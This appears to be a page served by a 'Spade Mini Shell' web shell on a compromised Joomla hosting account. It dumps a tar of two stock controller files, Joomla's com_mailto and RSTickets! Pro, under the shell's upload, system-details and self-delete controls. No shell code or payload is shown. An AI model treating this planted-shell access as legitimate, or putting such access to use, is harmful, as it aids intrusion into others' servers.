Spade

Mini Shell

Directory:~$ /home/lmsyaran/www/khsh/
Upload File
[Home] [System Details] [Kill Me]
Current File:~$ /home/lmsyaran/www/khsh/controller.php.tar

home/lmsyaran/public_html/joomla3/components/com_mailto/controller.php000064400000007432151171424540022406
0ustar00<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_mailto
 *
 * @copyright   (C) 2006 Open Source Matters, Inc.
<https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see
LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * Mailer Component Controller.
 *
 * @since  1.5
 */
class MailtoController extends JControllerLegacy
{
	/**
	 * Show the form so that the user can send the link to someone.
	 *
	 * @return  void
	 *
	 * @since   1.5
	 */
	public function mailto()
	{
		$this->input->set('view', 'mailto');
		$this->display();
	}

	/**
	 * Send the message and display a notice
	 *
	 * @return  void
	 *
	 * @since  1.5
	 */
	public function send()
	{
		// Check for request forgeries
		$this->checkToken();

		$app     = JFactory::getApplication();
		$model   = $this->getModel('mailto');
		$data    = $model->getData();

		// Validate the posted data.
		$form = $model->getForm();

		if (!$form)
		{
			JError::raiseError(500, $model->getError());

			return false;
		}

		if (!$model->validate($form, $data))
		{
			$errors = $model->getErrors();

			foreach ($errors as $error)
			{
				$errorMessage = $error;

				if ($error instanceof Exception)
				{
					$errorMessage = $error->getMessage();
				}

				$app->enqueueMessage($errorMessage, 'error');
			}

			return $this->mailto();
		}

		// An array of email headers we do not want to allow as input
		$headers = array (
			'Content-Type:',
			'MIME-Version:',
			'Content-Transfer-Encoding:',
			'bcc:',
			'cc:'
		);

		/*
		 * Here is the meat and potatoes of the header injection test.  We
		 * iterate over the array of form input and check for header strings.
		 * If we find one, send an unauthorized header and die.
		 */
		foreach ($data as $key => $value)
		{
			foreach ($headers as $header)
			{
				if (is_string($value) && strpos($value, $header) !== false)
				{
					JError::raiseError(403, '');
				}
			}
		}

		/*
		 * Free up memory
		 */
		unset($headers, $fields);

		$siteName = $app->get('sitename');
		$link     =
MailtoHelper::validateHash($this->input->post->get('link',
'', 'post'));

		// Verify that this is a local link
		if (!$link || !JUri::isInternal($link))
		{
			// Non-local url...
			JError::raiseNotice(500,
JText::_('COM_MAILTO_EMAIL_NOT_SENT'));

			return $this->mailto();
		}

		$subject_default = JText::sprintf('COM_MAILTO_SENT_BY',
$data['sender']);
		$subject         = $data['subject'] !== '' ?
$data['subject'] : $subject_default;

		// Check for a valid to address
		$error = false;

		if (!$data['emailto'] ||
!JMailHelper::isEmailAddress($data['emailto']))
		{
			$error = JText::sprintf('COM_MAILTO_EMAIL_INVALID',
$data['emailto']);

			JError::raiseWarning(0, $error);
		}

		// Check for a valid from address
		if (!$data['emailfrom'] ||
!JMailHelper::isEmailAddress($data['emailfrom']))
		{
			$error = JText::sprintf('COM_MAILTO_EMAIL_INVALID',
$data['emailfrom']);

			JError::raiseWarning(0, $error);
		}

		if ($error)
		{
			return $this->mailto();
		}

		// Build the message to send
		$msg  = JText::_('COM_MAILTO_EMAIL_MSG');
		$body = sprintf($msg, $siteName, $data['sender'],
$data['emailfrom'], $link);

		// Clean the email data
		$subject = JMailHelper::cleanSubject($subject);
		$body    = JMailHelper::cleanBody($body);

		// To send we need to use punycode.
		$data['emailfrom'] =
JStringPunycode::emailToPunycode($data['emailfrom']);
		$data['emailfrom'] =
JMailHelper::cleanAddress($data['emailfrom']);
		$data['emailto']   =
JStringPunycode::emailToPunycode($data['emailto']);

		// Send the email
		if (JFactory::getMailer()->sendMail($data['emailfrom'],
$data['sender'], $data['emailto'], $subject, $body) !==
true)
		{
			JError::raiseNotice(500,
JText::_('COM_MAILTO_EMAIL_NOT_SENT'));

			return $this->mailto();
		}

		$this->input->set('view', 'sent');
		$this->display();
	}
}
home/lmsyaran/public_html/j3/components/com_rsticketspro/controller.php000064400000012372151176044250022625
0ustar00<?php
/**
 * @package    RSTickets! Pro
 *
 * @copyright  (c) 2010 - 2016 RSJoomla!
 * @link       https://www.rsjoomla.com
 * @license    GNU General Public License
http://www.gnu.org/licenses/gpl-3.0.en.html
 */

defined('_JEXEC') or die('Restricted access');

class RsticketsproController extends JControllerLegacy
{
	public function captcha()
	{
		if (RSTicketsProHelper::getConfig('captcha_enabled') == 1)
		{
			require_once JPATH_ADMINISTRATOR .
'/components/com_rsticketspro/helpers/captcha/captcha.php';
			$captcha = new RsticketsproCaptcha;
			
			$captcha->setLength(RSTicketsProHelper::getConfig('captcha_characters'));
			
			ob_end_clean();

			$captcha->getImage();

			JFactory::getApplication()->setHeader('content-type',
'image/jpeg');
			JFactory::getApplication()->sendHeaders();
		}

		JFactory::getApplication()->close();
	}
	
	public function resetsearch()
	{
		$model = $this->getModel('tickets');
		$model->resetSearch();
		
		$this->setRedirect(RSTicketsProHelper::route('index.php?option=com_rsticketspro&view=tickets',
false));
	}
	
	public function cron()
	{
		if
(file_exists(JPATH_ADMINISTRATOR.'/components/com_rsticketspro/helpers/cron.php'))
		{
			require_once
JPATH_ADMINISTRATOR.'/components/com_rsticketspro/helpers/cron.php';
			
			$types 	= array(1,2);
			$cron 	= new RSTicketsProCron($types);
			
			$cron->parse();
		}
	}
	
	public function viewinline()
	{
		try
		{
			$db			 = JFactory::getDbo();
			$query		 = $db->getQuery(true);
			$app		 = JFactory::getApplication();
			$user		 = JFactory::getUser();
			$filename	 =
$app->input->getString('filename','');
			$ticket_id	 = $app->input->getInt('cid',0);
			$is_staff	 = RSTicketsProHelper::isStaff();
			$permissions = RSTicketsProHelper::getCurrentPermissions();
			$departments = RSTicketsProHelper::getCurrentDepartments();

			$query->select($db->qn('customer_id'))
				->select($db->qn('department_id'))
				->select($db->qn('staff_id'))
				->from($db->qn('#__rsticketspro_tickets'))
				->where($db->qn('id') .' = ' .
$db->q($ticket_id));

			$ticket = $db->setQuery($query)->loadObject();

			if (!$ticket)
			{
				throw new
Exception(JText::_('RST_CUSTOMER_CANNOT_VIEW_TICKET'));
			}

			// Check for permissions
			if (!$is_staff && $ticket->customer_id !=
$user->get('id'))
			{
				throw new
Exception(JText::_('RST_CUSTOMER_CANNOT_VIEW_TICKET'));
			}

			if ($is_staff)
			{
				// Staff - check if belongs to department only if he is not the
customer
				if ($ticket->customer_id != $user->get('id') &&
!in_array($ticket->department_id, $departments))
				{
					throw new
Exception(JText::_('RST_STAFF_CANNOT_VIEW_TICKET'));
				}

				if (RSTicketsProHelper::getConfig('staff_force_departments')
&& !in_array($ticket->department_id, $departments))
				{
					throw new
Exception(JText::_('RST_STAFF_CANNOT_VIEW_TICKET'));
				}

				if (!$permissions->see_unassigned_tickets &&
$ticket->staff_id == 0)
				{
					throw new
Exception(JText::_('RST_STAFF_CANNOT_VIEW_TICKET'));
				}

				if (!$permissions->see_other_tickets && $ticket->staff_id
> 0 && $ticket->staff_id != $user->get('id'))
				{
					throw new
Exception(JText::_('RST_STAFF_CANNOT_VIEW_TICKET'));
				}
			}

			$query->clear()
				->select('*')
				->from($db->qn('#__rsticketspro_ticket_files'))
				->where($db->qn('ticket_id') . ' = ' .
$db->q($ticket_id))
				->where($db->qn('filename') . ' = ' .
$db->q($filename));

			$file = $db->setQuery($query)->loadObject();

			if (empty($file))
			{
				throw new Exception(JText::_('RST_CANNOT_DOWNLOAD_FILE'));
			}

			$hash = md5($file->id . ' ' .
$file->ticket_message_id);
			$path = RST_UPLOAD_FOLDER . '/' . $hash;

			if (!file_exists($path))
			{
				throw new
Exception(JText::_('RST_CANNOT_DOWNLOAD_FILE_NOT_EXIST'));
			}

			$extension = strtolower(JFile::getExt($file->filename));
			$images    = array('jpg', 'jpeg', 'gif',
'png');
			if (in_array($extension, $images))
			{
				if ($extension === 'jpg')
				{
					$extension = 'jpeg';
				}

				header('Content-Type: image/'.$extension);
			}

			@ob_end_clean();

			header("Cache-Control: public, must-revalidate");
			header('Cache-Control: pre-check=0, post-check=0,
max-age=0');
			header("Cache-Control: no-cache");
			header("Pragma: no-cache");
			header("Expires: 0");
			header("Content-Description: File Transfer");
			header("Expires: Sat, 01 Jan 2000 01:00:00 GMT");
			header("Content-Length: " . (string) filesize($path));
			header('Content-Disposition: inline; filename="' .
$file->filename . '"');
			header("Content-Transfer-Encoding: binary\n");

			readfile($path);

			$app->close();
		}
		catch (Exception $e)
		{
			$app->enqueueMessage($e->getMessage(), 'warning');
			$app->redirect(RSTicketsProHelper::route('index.php?option=com_rsticketspro&view=tickets',
false));
		}
	}

	public function display($cachable = false, $urlparams = array())
	{
		$app = JFactory::getApplication();

		if ($app->isClient('site'))
		{
			$vName	= $app->input->getCmd('view', '');
			$allowed = JFolder::folders(__DIR__ . '/views');

			if (!in_array($vName, $allowed))
			{
				$app->input->set('view', 'tickets');
			}
		}

		parent::display($cachable, $urlparams);
	}
}